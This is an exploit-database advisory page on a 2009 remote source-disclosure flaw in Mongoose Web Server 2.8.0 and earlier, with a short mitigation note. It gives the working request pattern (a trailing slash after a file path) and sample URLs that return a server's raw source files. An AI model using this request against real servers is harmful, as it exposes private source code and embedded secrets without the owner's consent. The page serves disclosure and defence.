header-logo
Suggest Exploit
vendor:
Mongoose Web Server
by:
Dr_IDE
7.5
CVSS
HIGH
Remote Source Disclosure
200
CWE
Product Name: Mongoose Web Server
Affected Version From: Mongoose Web Server <= 2.8.0
Affected Version To: Mongoose Web Server <= 2.8.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mongoose:mongoose_web_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XPSP3
Found By: Dr_IDE in 2009

Mongoose Web Server <= 2.8.0 Remote Source Disclosure

Mongoose Web Server <= 2.8.0 is a Windows based HTTP server. This is the latest version of the application available. Mongoose is vulnerable to remote arbitrary source code disclosure by the following means. http://[ webserver IP][:port]/[ file ][/] http://172.16.2.101:8080/index.html/ http://172.16.2.101:8080/index.php/

Mitigation:

Ensure that the web server is configured to only serve files from the intended directory and that the directory is not accessible from the web.
Source

Exploit-DB raw data:

#######################################################
#
# Mongoose Web Server <= 2.8.0 Remote Source Disclosure
# Found By:	Dr_IDE
# Tested On:	Windows XPSP3
# Download: 	http://code.google.com/p/mongoose/
#
#######################################################

- Description -

Mongoose Web Server <= 2.8.0 is a Windows based HTTP server.
This is the latest version of the application available.

Mongoose is vulnerable to remote arbitrary source code
disclosure by the following means.

- Technical Details -

http://[ webserver IP][:port]/[ file ][/]

http://172.16.2.101:8080/index.html/
http://172.16.2.101:8080/index.php/

#[pocoftheday.blogspot.com]

Navigation

Suggest Exploit

Services By CQR